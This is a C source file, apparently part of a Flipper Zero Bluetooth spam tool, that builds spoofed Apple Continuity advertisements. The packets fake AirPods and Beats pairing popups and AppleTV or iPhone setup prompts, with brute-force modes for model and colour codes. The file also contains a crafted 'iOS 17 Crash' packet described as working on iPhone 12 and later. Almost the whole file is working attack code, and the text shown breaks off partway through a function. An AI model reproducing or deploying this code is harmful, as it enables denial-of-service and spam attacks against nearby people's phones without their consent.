continuity.c 43 KB

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989910010110210310410510610710810911011111211311411511611711811912012112212312412512612712812913013113213313413513613713813914014114214314414514614714814915015115215315415515615715815916016116216316416516616716816917017117217317417517617717817918018118218318418518618718818919019119219319419519619719819920020120220320420520620720820921021121221321421521621721821922022122222322422522622722822923023123223323423523623723823924024124224324424524624724824925025125225325425525625725825926026126226326426526626726826927027127227327427527627727827928028128228328428528628728828929029129229329429529629729829930030130230330430530630730830931031131231331431531631731831932032132232332432532632732832933033133233333433533633733833934034134234334434534634734834935035135235335435535635735835936036136236336436536636736836937037137237337437537637737837938038138238338438538638738838939039139239339439539639739839940040140240340440540640740840941041141241341441541641741841942042142242342442542642742842943043143243343443543643743843944044144244344444544644744844945045145245345445545645745845946046146246346446546646746846947047147247347447547647747847948048148248348448548648748848949049149249349449549649749849950050150250350450550650750850951051151251351451551651751851952052152252352452552652752852953053153253353453553653753853954054154254354454554654754854955055155255355455555655755855956056156256356456556656756856957057157257357457557657757857958058158258358458558658758858959059159259359459559659759859960060160260360460560660760860961061161261361461561661761861962062162262362462562662762862963063163263363463563663763863964064164264364464564664764864965065165265365465565665765865966066166266366466566666766866967067167267367467567667767867968068168268368468568668768868969069169269369469569669769869970070170270370470570670770870971071171271371471571671771871972072172272372472572672772872973073173273373473573673773873974074174274374474574674774874975075175275375475575675775875976076176276376476576676776876977077177277377477577677777877978078178278378478578678778878979079179279379479579679779879980080180280380480580680780880981081181281381481581681781881982082182282382482582682782882983083183283383483583683783883984084184284384484584684784884985085185285385485585685785885986086186286386486586686786886987087187287387487587687787887988088188288388488588688788888989089189289389489589689789889990090190290390490590690790890991091191291391491591691791891992092192292392492592692792892993093193293393493593693793893994094194294394494594694794894995095195295395495595695795895996096196296396496596696796896997097197297397497597697797897998098198298398498598698798898999099199299399499599699799899910001001100210031004100510061007100810091010101110121013101410151016101710181019102010211022102310241025102610271028102910301031103210331034103510361037103810391040104110421043104410451046104710481049105010511052105310541055105610571058105910601061106210631064106510661067106810691070107110721073107410751076107710781079108010811082108310841085108610871088108910901091109210931094109510961097109810991100110111021103110411051106110711081109111011111112111311141115111611171118111911201121112211231124112511261127112811291130113111321133113411351136113711381139114011411142114311441145114611471148114911501151115211531154115511561157115811591160116111621163116411651166116711681169117011711172117311741175117611771178117911801181118211831184118511861187118811891190119111921193119411951196119711981199
  1. #include "continuity.h"
  2. #include "_protocols.h"
  3. // Hacked together by @Willy-JL
  4. // iOS 17 Crash by @ECTO-1A
  5. // Nearby Action IDs and Documentation at https://github.com/furiousMAC/continuity/
  6. // Proximity Pair IDs from https://github.com/ECTO-1A/AppleJuice/
  7. typedef struct {
  8. uint8_t value;
  9. const char* name;
  10. } ContinuityColor;
  11. static const ContinuityColor colors_white[] = {
  12. {0x00, "White"},
  13. };
  14. static const ContinuityColor colors_beats_flex[] = {
  15. {0x00, "White"},
  16. {0x01, "Black"},
  17. };
  18. static const ContinuityColor colors_beats_solo_3[] = {
  19. {0x00, "White"},
  20. {0x01, "Black"},
  21. };
  22. static const ContinuityColor colors_powerbeats_3[] = {
  23. {0x00, "White"},
  24. {0x01, "Black"},
  25. };
  26. static const ContinuityColor colors_powerbeats_pro[] = {
  27. {0x00, "White"},
  28. {0x01, "Black"},
  29. };
  30. static const ContinuityColor colors_beats_solo_pro[] = {
  31. {0x00, "White"},
  32. {0x01, "Black"},
  33. };
  34. static const ContinuityColor colors_beats_studio_buds[] = {
  35. {0x00, "White"},
  36. {0x01, "Black"},
  37. };
  38. static const ContinuityColor colors_beats_x[] = {
  39. {0x00, "White"},
  40. {0x01, "Black"},
  41. };
  42. static const ContinuityColor colors_beats_studio_3[] = {
  43. {0x00, "White"},
  44. {0x01, "Black"},
  45. {0x03, "Red"},
  46. {0x43, "White marble"},
  47. };
  48. static const ContinuityColor colors_beats_studio_pro[] = {
  49. {0x00, "White"},
  50. {0x01, "Black"},
  51. };
  52. static const ContinuityColor colors_beats_fit_pro[] = {
  53. {0x00, "White"},
  54. {0x01, "Black"},
  55. };
  56. static const ContinuityColor colors_beats_studio_buds_[] = {
  57. {0x00, "White"},
  58. {0x01, "Black"},
  59. };
  60. static const struct {
  61. uint16_t value;
  62. const char* name;
  63. const ContinuityColor* colors;
  64. const uint8_t colors_count;
  65. } pp_models[] = {
  66. {0x0E20, "AirPods Pro", colors_white, COUNT_OF(colors_white)},
  67. {0x0A20, "AirPods Max", colors_white, COUNT_OF(colors_white)},
  68. {0x0055, "Airtag", colors_white, COUNT_OF(colors_white)},
  69. {0x0030, "Hermes Airtag", colors_white, COUNT_OF(colors_white)},
  70. {0x0220, "AirPods", colors_white, COUNT_OF(colors_white)},
  71. {0x0F20, "AirPods 2nd Gen", colors_white, COUNT_OF(colors_white)},
  72. {0x1320, "AirPods 3rd Gen", colors_white, COUNT_OF(colors_white)},
  73. {0x1420, "AirPods Pro 2nd Gen", colors_white, COUNT_OF(colors_white)},
  74. {0x1020, "Beats Flex", colors_beats_flex, COUNT_OF(colors_beats_flex)},
  75. {0x0620, "Beats Solo 3", colors_beats_solo_3, COUNT_OF(colors_beats_solo_3)},
  76. {0x0320, "Powerbeats 3", colors_powerbeats_3, COUNT_OF(colors_powerbeats_3)},
  77. {0x0B20, "Powerbeats Pro", colors_powerbeats_pro, COUNT_OF(colors_powerbeats_pro)},
  78. {0x0C20, "Beats Solo Pro", colors_beats_solo_pro, COUNT_OF(colors_beats_solo_pro)},
  79. {0x1120, "Beats Studio Buds", colors_beats_studio_buds, COUNT_OF(colors_beats_studio_buds)},
  80. {0x0520, "Beats X", colors_beats_x, COUNT_OF(colors_beats_x)},
  81. {0x0920, "Beats Studio 3", colors_beats_studio_3, COUNT_OF(colors_beats_studio_3)},
  82. {0x1720, "Beats Studio Pro", colors_beats_studio_pro, COUNT_OF(colors_beats_studio_pro)},
  83. {0x1220, "Beats Fit Pro", colors_beats_fit_pro, COUNT_OF(colors_beats_fit_pro)},
  84. {0x1620, "Beats Studio Buds+", colors_beats_studio_buds_, COUNT_OF(colors_beats_studio_buds_)},
  85. };
  86. static const uint8_t pp_models_count = COUNT_OF(pp_models);
  87. static const struct {
  88. uint8_t value;
  89. const char* name;
  90. } pp_prefixes[] = {
  91. {0x07, "New Device"},
  92. {0x01, "Not Your Device"},
  93. {0x05, "New Airtag"},
  94. };
  95. static const uint8_t pp_prefixes_count = COUNT_OF(pp_prefixes);
  96. static const struct {
  97. uint8_t value;
  98. const char* name;
  99. } na_actions[] = {
  100. {0x13, "AppleTV AutoFill"},
  101. {0x27, "AppleTV Connecting..."},
  102. {0x20, "Join This AppleTV?"},
  103. {0x19, "AppleTV Audio Sync"},
  104. {0x1E, "AppleTV Color Balance"},
  105. {0x09, "Setup New iPhone"},
  106. {0x02, "Transfer Phone Number"},
  107. {0x0B, "HomePod Setup"},
  108. {0x01, "Setup New AppleTV"},
  109. {0x06, "Pair AppleTV"},
  110. {0x0D, "HomeKit AppleTV Setup"},
  111. {0x2B, "AppleID for AppleTV?"},
  112. };
  113. static const uint8_t na_actions_count = COUNT_OF(na_actions);
  114. static const char* type_names[ContinuityTypeCOUNT] = {
  115. [ContinuityTypeAirDrop] = "AirDrop",
  116. [ContinuityTypeProximityPair] = "Continuity Pair",
  117. [ContinuityTypeAirplayTarget] = "Airplay Target",
  118. [ContinuityTypeHandoff] = "Handoff",
  119. [ContinuityTypeTetheringSource] = "Tethering Source",
  120. [ContinuityTypeNearbyAction] = "Continuity Action",
  121. [ContinuityTypeNearbyInfo] = "Nearby Info",
  122. [ContinuityTypeCustomCrash] = "Continuity Custom",
  123. };
  124. static const char* get_name(const Payload* payload) {
  125. const ContinuityCfg* cfg = &payload->cfg.continuity;
  126. return type_names[cfg->type];
  127. }
  128. #define HEADER_LEN (6) // 1 Size + 1 AD Type + 2 Company ID + 1 Continuity Type + 1 Continuity Size
  129. static uint8_t packet_sizes[ContinuityTypeCOUNT] = {
  130. [ContinuityTypeAirDrop] = HEADER_LEN + 18,
  131. [ContinuityTypeProximityPair] = HEADER_LEN + 25,
  132. [ContinuityTypeAirplayTarget] = HEADER_LEN + 6,
  133. [ContinuityTypeHandoff] = HEADER_LEN + 14,
  134. [ContinuityTypeTetheringSource] = HEADER_LEN + 6,
  135. [ContinuityTypeNearbyAction] = HEADER_LEN + 5,
  136. [ContinuityTypeNearbyInfo] = HEADER_LEN + 5,
  137. [ContinuityTypeCustomCrash] = HEADER_LEN + 11,
  138. };
  139. static void make_packet(uint8_t* _size, uint8_t** _packet, Payload* payload) {
  140. ContinuityCfg* cfg = payload ? &payload->cfg.continuity : NULL;
  141. ContinuityType type;
  142. if(cfg && cfg->type != 0x00) {
  143. type = cfg->type;
  144. } else {
  145. const ContinuityType types[] = {
  146. ContinuityTypeProximityPair,
  147. ContinuityTypeNearbyAction,
  148. ContinuityTypeCustomCrash,
  149. };
  150. type = types[rand() % COUNT_OF(types)];
  151. }
  152. uint8_t size = packet_sizes[type];
  153. uint8_t* packet = malloc(size);
  154. uint8_t i = 0;
  155. packet[i++] = size - 1; // Size
  156. packet[i++] = 0xFF; // AD Type (Manufacturer Specific)
  157. packet[i++] = 0x4C; // Company ID (Apple, Inc.)
  158. packet[i++] = 0x00; // ...
  159. packet[i++] = type; // Continuity Type
  160. packet[i] = size - i - 1; // Continuity Size
  161. i++;
  162. switch(type) {
  163. case ContinuityTypeAirDrop: {
  164. packet[i++] = 0x00; // Zeros
  165. packet[i++] = 0x00; // ...
  166. packet[i++] = 0x00; // ...
  167. packet[i++] = 0x00; // ...
  168. packet[i++] = 0x00; // ...
  169. packet[i++] = 0x00; // ...
  170. packet[i++] = 0x00; // ...
  171. packet[i++] = 0x00; // ...
  172. packet[i++] = 0x01; // Version
  173. packet[i++] = (rand() % 256); // AppleID
  174. packet[i++] = (rand() % 256); // ...
  175. packet[i++] = (rand() % 256); // Phone Number
  176. packet[i++] = (rand() % 256); // ...
  177. packet[i++] = (rand() % 256); // Email
  178. packet[i++] = (rand() % 256); // ...
  179. packet[i++] = (rand() % 256); // Email2
  180. packet[i++] = (rand() % 256); // ...
  181. packet[i++] = 0x00; // Zero
  182. break;
  183. }
  184. case ContinuityTypeProximityPair: {
  185. uint16_t model;
  186. uint8_t color;
  187. switch(payload ? payload->mode : PayloadModeRandom) {
  188. case PayloadModeRandom:
  189. default: {
  190. uint8_t model_index = rand() % pp_models_count;
  191. uint8_t color_index = rand() % pp_models[model_index].colors_count;
  192. model = pp_models[model_index].value;
  193. color = pp_models[model_index].colors[color_index].value;
  194. break;
  195. }
  196. case PayloadModeValue:
  197. model = cfg->data.proximity_pair.model;
  198. color = cfg->data.proximity_pair.color;
  199. break;
  200. case PayloadModeBruteforce:
  201. switch(cfg->data.proximity_pair.bruteforce_mode) {
  202. case ContinuityPpBruteforceModel:
  203. default:
  204. model = cfg->data.proximity_pair.model = payload->bruteforce.value;
  205. color = cfg->data.proximity_pair.color;
  206. break;
  207. case ContinuityPpBruteforceColor:
  208. model = cfg->data.proximity_pair.model;
  209. color = cfg->data.proximity_pair.color = payload->bruteforce.value;
  210. break;
  211. }
  212. break;
  213. }
  214. uint8_t prefix;
  215. if(cfg && cfg->data.proximity_pair.prefix != 0x00) {
  216. prefix = cfg->data.proximity_pair.prefix;
  217. } else {
  218. if(model == 0x0055 || model == 0x0030)
  219. prefix = 0x05;
  220. else
  221. prefix = 0x01;
  222. }
  223. packet[i++] = prefix; // Prefix (paired 0x01 new 0x07 airtag 0x05)
  224. packet[i++] = (model >> 0x08) & 0xFF; // Device Model
  225. packet[i++] = (model >> 0x00) & 0xFF; // ...
  226. packet[i++] = 0x55; // Status
  227. packet[i++] = ((rand() % 10) << 4) + (rand() % 10); // Buds Battery Level
  228. packet[i++] = ((rand() % 8) << 4) + (rand() % 10); // Charing Status and Battery Case Level
  229. packet[i++] = (rand() % 256); // Lid Open Counter
  230. packet[i++] = color; // Device Color
  231. packet[i++] = 0x00;
  232. furi_hal_random_fill_buf(&packet[i], 16); // Encrypted Payload
  233. i += 16;
  234. break;
  235. }
  236. case ContinuityTypeAirplayTarget: {
  237. packet[i++] = (rand() % 256); // Flags
  238. packet[i++] = (rand() % 256); // Configuration Seed
  239. packet[i++] = (rand() % 256); // IPv4 Address
  240. packet[i++] = (rand() % 256); // ...
  241. packet[i++] = (rand() % 256); // ...
  242. packet[i++] = (rand() % 256); // ...
  243. break;
  244. }
  245. case ContinuityTypeHandoff: {
  246. packet[i++] = 0x01; // Version
  247. packet[i++] = (rand() % 256); // Initialization Vector
  248. packet[i++] = (rand() % 256); // ...
  249. packet[i++] = (rand() % 256); // AES-GCM Auth Tag
  250. packet[i++] = (rand() % 256); // Encrypted Payload
  251. packet[i++] = (rand() % 256); // ...
  252. packet[i++] = (rand() % 256); // ...
  253. packet[i++] = (rand() % 256); // ...
  254. packet[i++] = (rand() % 256); // ...
  255. packet[i++] = (rand() % 256); // ...
  256. packet[i++] = (rand() % 256); // ...
  257. packet[i++] = (rand() % 256); // ...
  258. packet[i++] = (rand() % 256); // ...
  259. packet[i++] = (rand() % 256); // ...
  260. break;
  261. }
  262. case ContinuityTypeTetheringSource: {
  263. packet[i++] = 0x01; // Version
  264. packet[i++] = (rand() % 256); // Flags
  265. packet[i++] = (rand() % 101); // Battery Life
  266. packet[i++] = 0x00; // Cell Service Type
  267. packet[i++] = (rand() % 8); // ...
  268. packet[i++] = (rand() % 5); // Cell Service Strength
  269. break;
  270. }
  271. case ContinuityTypeNearbyAction: {
  272. uint8_t action;
  273. switch(payload ? payload->mode : PayloadModeRandom) {
  274. case PayloadModeRandom:
  275. default:
  276. action = na_actions[rand() % na_actions_count].value;
  277. break;
  278. case PayloadModeValue:
  279. action = cfg->data.nearby_action.action;
  280. break;
  281. case PayloadModeBruteforce:
  282. action = cfg->data.nearby_action.action = payload->bruteforce.value;
  283. break;
  284. }
  285. uint8_t flags;
  286. if(cfg && cfg->data.nearby_action.flags != 0x00) {
  287. flags = cfg->data.nearby_action.flags;
  288. } else {
  289. flags = 0xC0;
  290. if(action == 0x20 && rand() % 2) flags--; // More spam for 'Join This AppleTV?'
  291. if(action == 0x09 && rand() % 2) flags = 0x40; // Glitched 'Setup New Device'
  292. }
  293. packet[i++] = flags; // Action Flags
  294. packet[i++] = action; // Action Type
  295. furi_hal_random_fill_buf(&packet[i], 3); // Authentication Tag
  296. i += 3;
  297. break;
  298. }
  299. case ContinuityTypeNearbyInfo: {
  300. packet[i++] = ((rand() % 16) << 4) + (rand() % 16); // Status Flags and Action Code
  301. packet[i++] = (rand() % 256); // Status Flags
  302. packet[i++] = (rand() % 256); // Authentication Tag
  303. packet[i++] = (rand() % 256); // ...
  304. packet[i++] = (rand() % 256); // ...
  305. break;
  306. }
  307. case ContinuityTypeCustomCrash: {
  308. // Found by @ECTO-1A
  309. uint8_t action = na_actions[rand() % na_actions_count].value;
  310. uint8_t flags = 0xC0;
  311. if(action == 0x20 && rand() % 2) flags--; // More spam for 'Join This AppleTV?'
  312. if(action == 0x09 && rand() % 2) flags = 0x40; // Glitched 'Setup New Device'
  313. i -= 2; // Override segment header
  314. packet[i++] = ContinuityTypeNearbyAction; // Continuity Type
  315. packet[i++] = 5; // Continuity Size
  316. packet[i++] = flags; // Action Flags
  317. packet[i++] = action; // Action Type
  318. furi_hal_random_fill_buf(&packet[i], 3); // Authentication Tag
  319. i += 3;
  320. packet[i++] = 0x00; // Additional Action Data Terminator (?)
  321. packet[i++] = 0x00; // ...
  322. packet[i++] = ContinuityTypeNearbyInfo; // Continuity Type (?)
  323. furi_hal_random_fill_buf(&packet[i], 3); // Continuity Size (?) + Shenanigans (???)
  324. i += 3;
  325. break;
  326. }
  327. default:
  328. break;
  329. }
  330. *_size = size;
  331. *_packet = packet;
  332. }
  333. enum {
  334. _ConfigPpExtraStart = ConfigExtraStart,
  335. ConfigPpModel,
  336. ConfigPpColor,
  337. ConfigPpPrefix,
  338. ConfigPpCOUNT,
  339. };
  340. enum {
  341. _ConfigNaExtraStart = ConfigExtraStart,
  342. ConfigNaAction,
  343. ConfigNaFlags,
  344. ConfigNaCOUNT,
  345. };
  346. enum {
  347. _ConfigCcExtraStart = ConfigExtraStart,
  348. ConfigCcInfoLock,
  349. ConfigCcInfoDevice,
  350. ConfigCcCOUNT,
  351. };
  352. static void config_callback(void* _ctx, uint32_t index) {
  353. Ctx* ctx = _ctx;
  354. Payload* payload = &ctx->attack->payload;
  355. ContinuityCfg* cfg = &payload->cfg.continuity;
  356. scene_manager_set_scene_state(ctx->scene_manager, SceneConfig, index);
  357. switch(cfg->type) {
  358. case ContinuityTypeProximityPair: {
  359. switch(index) {
  360. case ConfigPpModel:
  361. scene_manager_next_scene(ctx->scene_manager, SceneContinuityPpModel);
  362. break;
  363. case ConfigPpColor:
  364. if(payload->mode != PayloadModeRandom)
  365. scene_manager_next_scene(ctx->scene_manager, SceneContinuityPpColor);
  366. break;
  367. case ConfigPpPrefix:
  368. scene_manager_next_scene(ctx->scene_manager, SceneContinuityPpPrefix);
  369. break;
  370. default:
  371. ctx->fallback_config_enter(ctx, index);
  372. break;
  373. }
  374. break;
  375. }
  376. case ContinuityTypeNearbyAction: {
  377. switch(index) {
  378. case ConfigNaAction:
  379. scene_manager_next_scene(ctx->scene_manager, SceneContinuityNaAction);
  380. break;
  381. case ConfigNaFlags:
  382. scene_manager_next_scene(ctx->scene_manager, SceneContinuityNaFlags);
  383. break;
  384. default:
  385. ctx->fallback_config_enter(ctx, index);
  386. break;
  387. }
  388. break;
  389. }
  390. case ContinuityTypeCustomCrash: {
  391. switch(index) {
  392. case ConfigCcInfoLock:
  393. case ConfigCcInfoDevice:
  394. break;
  395. default:
  396. ctx->fallback_config_enter(ctx, index);
  397. break;
  398. }
  399. break;
  400. }
  401. default:
  402. ctx->fallback_config_enter(ctx, index);
  403. break;
  404. }
  405. }
  406. static void pp_model_changed(VariableItem* item) {
  407. Ctx* ctx = variable_item_get_context(item);
  408. Payload* payload = &ctx->attack->payload;
  409. ContinuityCfg* cfg = &payload->cfg.continuity;
  410. uint8_t index = variable_item_get_current_value_index(item);
  411. const char* color_name = NULL;
  412. char color_name_buf[3];
  413. uint8_t colors_count;
  414. uint8_t value_index_color;
  415. if(index) {
  416. index--;
  417. if(payload->mode != PayloadModeBruteforce ||
  418. cfg->data.proximity_pair.bruteforce_mode == ContinuityPpBruteforceModel)
  419. payload->mode = PayloadModeValue;
  420. cfg->data.proximity_pair.model = pp_models[index].value;
  421. variable_item_set_current_value_text(item, pp_models[index].name);
  422. colors_count = pp_models[index].colors_count;
  423. if(payload->mode == PayloadModeValue) {
  424. for(uint8_t j = 0; j < colors_count; j++) {
  425. if(cfg->data.proximity_pair.color == pp_models[index].colors[j].value) {
  426. color_name = pp_models[index].colors[j].name;
  427. value_index_color = j;
  428. break;
  429. }
  430. }
  431. if(!color_name) {
  432. snprintf(
  433. color_name_buf, sizeof(color_name_buf), "%02X", cfg->data.proximity_pair.color);
  434. color_name = color_name_buf;
  435. value_index_color = colors_count;
  436. }
  437. } else {
  438. color_name = "Bruteforce";
  439. value_index_color = colors_count;
  440. }
  441. } else {
  442. payload->mode = PayloadModeRandom;
  443. variable_item_set_current_value_text(item, "Random");
  444. color_name = "Random";
  445. colors_count = 1;
  446. value_index_color = 0;
  447. }
  448. item = variable_item_list_get(ctx->variable_item_list, ConfigPpColor);
  449. variable_item_set_values_count(item, colors_count);
  450. variable_item_set_current_value_index(item, value_index_color);
  451. variable_item_set_current_value_text(item, color_name);
  452. }
  453. static void pp_color_changed(VariableItem* item) {
  454. Payload* payload = variable_item_get_context(item);
  455. ContinuityCfg* cfg = &payload->cfg.continuity;
  456. uint8_t index = variable_item_get_current_value_index(item);
  457. if(payload->mode != PayloadModeBruteforce ||
  458. cfg->data.proximity_pair.bruteforce_mode == ContinuityPpBruteforceColor)
  459. payload->mode = PayloadModeValue;
  460. uint8_t model_index = 0;
  461. for(; model_index < pp_models_count; model_index++) {
  462. if(cfg->data.proximity_pair.model == pp_models[model_index].value) break;
  463. }
  464. cfg->data.proximity_pair.color = pp_models[model_index].colors[index].value;
  465. variable_item_set_current_value_text(item, pp_models[model_index].colors[index].name);
  466. }
  467. static void pp_prefix_changed(VariableItem* item) {
  468. Payload* payload = variable_item_get_context(item);
  469. ContinuityCfg* cfg = &payload->cfg.continuity;
  470. uint8_t index = variable_item_get_current_value_index(item);
  471. if(index) {
  472. index--;
  473. cfg->data.proximity_pair.prefix = pp_prefixes[index].value;
  474. variable_item_set_current_value_text(item, pp_prefixes[index].name);
  475. } else {
  476. cfg->data.proximity_pair.prefix = 0x00;
  477. variable_item_set_current_value_text(item, "Auto");
  478. }
  479. }
  480. static void na_action_changed(VariableItem* item) {
  481. Payload* payload = variable_item_get_context(item);
  482. ContinuityCfg* cfg = &payload->cfg.continuity;
  483. uint8_t index = variable_item_get_current_value_index(item);
  484. if(index) {
  485. index--;
  486. payload->mode = PayloadModeValue;
  487. cfg->data.nearby_action.action = na_actions[index].value;
  488. variable_item_set_current_value_text(item, na_actions[index].name);
  489. } else {
  490. payload->mode = PayloadModeRandom;
  491. variable_item_set_current_value_text(item, "Random");
  492. }
  493. }
  494. static void extra_config(Ctx* ctx) {
  495. Payload* payload = &ctx->attack->payload;
  496. ContinuityCfg* cfg = &payload->cfg.continuity;
  497. VariableItemList* list = ctx->variable_item_list;
  498. VariableItem* item;
  499. uint8_t value_index;
  500. switch(cfg->type) {
  501. case ContinuityTypeProximityPair: {
  502. item =
  503. variable_item_list_add(list, "Model Code", pp_models_count + 1, pp_model_changed, ctx);
  504. const char* model_name = NULL;
  505. char model_name_buf[5];
  506. const char* color_name = NULL;
  507. char color_name_buf[3];
  508. uint8_t colors_count;
  509. uint8_t value_index_color;
  510. switch(payload->mode) {
  511. case PayloadModeRandom:
  512. default:
  513. model_name = "Random";
  514. value_index = 0;
  515. color_name = "Random";
  516. colors_count = 1;
  517. value_index_color = 0;
  518. break;
  519. case PayloadModeValue:
  520. for(uint8_t i = 0; i < pp_models_count; i++) {
  521. if(cfg->data.proximity_pair.model == pp_models[i].value) {
  522. model_name = pp_models[i].name;
  523. value_index = i + 1;
  524. colors_count = pp_models[i].colors_count;
  525. for(uint8_t j = 0; j < colors_count; j++) {
  526. if(cfg->data.proximity_pair.color == pp_models[i].colors[j].value) {
  527. color_name = pp_models[i].colors[j].name;
  528. value_index_color = j;
  529. break;
  530. }
  531. }
  532. break;
  533. }
  534. }
  535. if(!model_name) {
  536. snprintf(
  537. model_name_buf, sizeof(model_name_buf), "%04X", cfg->data.proximity_pair.model);
  538. model_name = model_name_buf;
  539. value_index = pp_models_count + 1;
  540. colors_count = 0;
  541. }
  542. if(!color_name) {
  543. snprintf(
  544. color_name_buf, sizeof(color_name_buf), "%02X", cfg->data.proximity_pair.color);
  545. color_name = color_name_buf;
  546. value_index_color = colors_count;
  547. }
  548. break;
  549. case PayloadModeBruteforce:
  550. switch(cfg->data.proximity_pair.bruteforce_mode) {
  551. case ContinuityPpBruteforceModel:
  552. default:
  553. model_name = "Bruteforce";
  554. value_index = pp_models_count + 1;
  555. snprintf(
  556. color_name_buf, sizeof(color_name_buf), "%02X", cfg->data.proximity_pair.color);
  557. color_name = color_name_buf;
  558. colors_count = 1;
  559. value_index_color = 0;
  560. break;
  561. case ContinuityPpBruteforceColor:
  562. for(uint8_t i = 0; i < pp_models_count; i++) {
  563. if(cfg->data.proximity_pair.model == pp_models[i].value) {
  564. model_name = pp_models[i].name;
  565. value_index = i + 1;
  566. colors_count = pp_models[i].colors_count;
  567. break;
  568. }
  569. }
  570. if(!model_name) {
  571. snprintf(
  572. model_name_buf,
  573. sizeof(model_name_buf),
  574. "%04X",
  575. cfg->data.proximity_pair.model);
  576. model_name = model_name_buf;
  577. value_index = pp_models_count + 1;
  578. colors_count = 0;
  579. }
  580. color_name = "Bruteforce";
  581. value_index_color = colors_count;
  582. break;
  583. }
  584. break;
  585. }
  586. variable_item_set_current_value_index(item, value_index);
  587. variable_item_set_current_value_text(item, model_name);
  588. item =
  589. variable_item_list_add(list, "Device Color", colors_count, pp_color_changed, payload);
  590. variable_item_set_current_value_index(item, value_index_color);
  591. variable_item_set_current_value_text(item, color_name);
  592. item = variable_item_list_add(
  593. list, "Prefix", pp_prefixes_count + 1, pp_prefix_changed, payload);
  594. const char* prefix_name = NULL;
  595. char prefix_name_buf[3];
  596. if(cfg->data.proximity_pair.prefix == 0x00) {
  597. prefix_name = "Auto";
  598. value_index = 0;
  599. } else {
  600. for(uint8_t i = 0; i < pp_prefixes_count; i++) {
  601. if(cfg->data.proximity_pair.prefix == pp_prefixes[i].value) {
  602. prefix_name = pp_prefixes[i].name;
  603. value_index = i + 1;
  604. break;
  605. }
  606. }
  607. if(!prefix_name) {
  608. snprintf(
  609. prefix_name_buf,
  610. sizeof(prefix_name_buf),
  611. "%02X",
  612. cfg->data.proximity_pair.prefix);
  613. prefix_name = prefix_name_buf;
  614. value_index = pp_prefixes_count + 1;
  615. }
  616. }
  617. variable_item_set_current_value_index(item, value_index);
  618. variable_item_set_current_value_text(item, prefix_name);
  619. break;
  620. }
  621. case ContinuityTypeNearbyAction: {
  622. item = variable_item_list_add(
  623. list, "Action Type", na_actions_count + 1, na_action_changed, payload);
  624. const char* action_name = NULL;
  625. char action_name_buf[3];
  626. switch(payload->mode) {
  627. case PayloadModeRandom:
  628. default:
  629. action_name = "Random";
  630. value_index = 0;
  631. break;
  632. case PayloadModeValue:
  633. for(uint8_t i = 0; i < na_actions_count; i++) {
  634. if(cfg->data.nearby_action.action == na_actions[i].value) {
  635. action_name = na_actions[i].name;
  636. value_index = i + 1;
  637. break;
  638. }
  639. }
  640. if(!action_name) {
  641. snprintf(
  642. action_name_buf,
  643. sizeof(action_name_buf),
  644. "%02X",
  645. cfg->data.nearby_action.action);
  646. action_name = action_name_buf;
  647. value_index = na_actions_count + 1;
  648. }
  649. break;
  650. case PayloadModeBruteforce:
  651. action_name = "Bruteforce";
  652. value_index = na_actions_count + 1;
  653. break;
  654. }
  655. variable_item_set_current_value_index(item, value_index);
  656. variable_item_set_current_value_text(item, action_name);
  657. item = variable_item_list_add(list, "Flags", 0, NULL, NULL);
  658. const char* flags_name = NULL;
  659. char flags_name_buf[3];
  660. if(cfg->data.nearby_action.flags == 0x00) {
  661. flags_name = "Auto";
  662. } else {
  663. snprintf(
  664. flags_name_buf, sizeof(flags_name_buf), "%02X", cfg->data.nearby_action.flags);
  665. flags_name = flags_name_buf;
  666. }
  667. variable_item_set_current_value_text(item, flags_name);
  668. break;
  669. }
  670. case ContinuityTypeCustomCrash: {
  671. variable_item_list_add(list, "Lock+unlock helps to crash", 0, NULL, NULL);
  672. variable_item_list_add(list, "Works on iPhone 12 and up", 0, NULL, NULL);
  673. break;
  674. }
  675. default:
  676. break;
  677. }
  678. variable_item_list_set_enter_callback(list, config_callback, ctx);
  679. }
  680. static uint8_t config_counts[ContinuityTypeCOUNT] = {
  681. [ContinuityTypeAirDrop] = 0,
  682. [ContinuityTypeProximityPair] = ConfigPpCOUNT - ConfigExtraStart - 1,
  683. [ContinuityTypeAirplayTarget] = 0,
  684. [ContinuityTypeHandoff] = 0,
  685. [ContinuityTypeTetheringSource] = 0,
  686. [ContinuityTypeNearbyAction] = ConfigNaCOUNT - ConfigExtraStart - 1,
  687. [ContinuityTypeNearbyInfo] = 0,
  688. [ContinuityTypeCustomCrash] = ConfigCcCOUNT - ConfigExtraStart - 1,
  689. };
  690. static uint8_t config_count(const Payload* payload) {
  691. const ContinuityCfg* cfg = &payload->cfg.continuity;
  692. return config_counts[cfg->type];
  693. }
  694. const Protocol protocol_continuity = {
  695. .icon = &I_apple,
  696. .get_name = get_name,
  697. .make_packet = make_packet,
  698. .extra_config = extra_config,
  699. .config_count = config_count,
  700. };
  701. static void pp_model_callback(void* _ctx, uint32_t index) {
  702. Ctx* ctx = _ctx;
  703. Payload* payload = &ctx->attack->payload;
  704. ContinuityCfg* cfg = &payload->cfg.continuity;
  705. switch(index) {
  706. case 0:
  707. payload->mode = PayloadModeRandom;
  708. scene_manager_previous_scene(ctx->scene_manager);
  709. break;
  710. case pp_models_count + 1:
  711. scene_manager_next_scene(ctx->scene_manager, SceneContinuityPpModelCustom);
  712. break;
  713. case pp_models_count + 2:
  714. payload->mode = PayloadModeBruteforce;
  715. payload->bruteforce.counter = 0;
  716. payload->bruteforce.value = cfg->data.proximity_pair.model;
  717. payload->bruteforce.size = 2;
  718. cfg->data.proximity_pair.bruteforce_mode = ContinuityPpBruteforceModel;
  719. scene_manager_previous_scene(ctx->scene_manager);
  720. break;
  721. default:
  722. if(payload->mode != PayloadModeBruteforce ||
  723. cfg->data.proximity_pair.bruteforce_mode == ContinuityPpBruteforceModel)
  724. payload->mode = PayloadModeValue;
  725. cfg->data.proximity_pair.model = pp_models[index - 1].value;
  726. scene_manager_previous_scene(ctx->scene_manager);
  727. break;
  728. }
  729. }
  730. void scene_continuity_pp_model_on_enter(void* _ctx) {
  731. Ctx* ctx = _ctx;
  732. Payload* payload = &ctx->attack->payload;
  733. ContinuityCfg* cfg = &payload->cfg.continuity;
  734. Submenu* submenu = ctx->submenu;
  735. uint32_t selected = 0;
  736. submenu_reset(submenu);
  737. bool value = payload->mode == PayloadModeValue ||
  738. (payload->mode == PayloadModeBruteforce &&
  739. cfg->data.proximity_pair.bruteforce_mode != ContinuityPpBruteforceModel);
  740. submenu_add_item(submenu, "Random", 0, pp_model_callback, ctx);
  741. if(payload->mode == PayloadModeRandom) {
  742. selected = 0;
  743. }
  744. bool found = false;
  745. for(uint8_t i = 0; i < pp_models_count; i++) {
